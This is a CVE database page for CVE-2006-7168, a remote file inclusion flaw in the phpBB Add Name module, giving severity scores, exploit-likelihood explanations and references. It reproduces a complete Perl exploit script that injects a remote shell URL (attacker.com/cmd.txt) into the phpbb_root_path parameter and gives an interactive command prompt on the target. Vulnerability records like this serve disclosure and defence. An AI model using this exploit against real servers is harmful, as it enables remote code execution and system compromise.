CVE-2006-7168 : Detail

CVE-2006-7168

2.57%V3
Network
2007-03-20
09h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP remote file inclusion vulnerability in includes/not_mem.php in the Add Name module for PHP allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28804

Publication date : 2006-10-12 22h00 +00:00
Author : Nima Salehi
EDB Verified : Yes

source: https://www.securityfocus.com/bid/20516/info The Add Name component for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible. #!/usr/bin/perl ##################################################################################################### # # # phpBB Add Name # # # # Class: Remote File Include Vulnerability # # # # Patch: unavailable # # # # Date: 2006/10/12 # # # # Remote: Yes # # # # Type: high # # # # Site: http://web.dhjh.tcc.edu.tw/~gzqbyr/php_docs/phpBB/add_name.zip/ # # # ##################################################################################################### use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script print "\n"; print "##########################################################################\n"; print "# #\n"; print "# phpBB Add Name Remote File Include Vulnerability #\n"; print "# Bug found By : Ashiyane Corporation #\n"; print "# Email: nima salehi nima[at]ashiyane.ir #\n"; print "# Web Site : www.Ashiyane.ir #\n"; print "# #\n"; print "##########################################################################\n"; if (@ARGV < 2) { print "\n Usage: Ashiyane.pl [host] [path] "; print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vul="includes/not_mem.php?phpbb_root_path=" print "Type Your Commands ( uname -a )\n"; print "For Exiit Type END\n"; print "<Shell> ";$cmd = <STDIN>; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "<Shell> "; $cmd = <STDIN>; }

Products Mentioned

Configuraton 0

Phpbb>>Phpbb >> Version -

References

http://www.securityfocus.com/bid/20516
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/2450
Tags : third-party-advisory, x_refsource_SREASON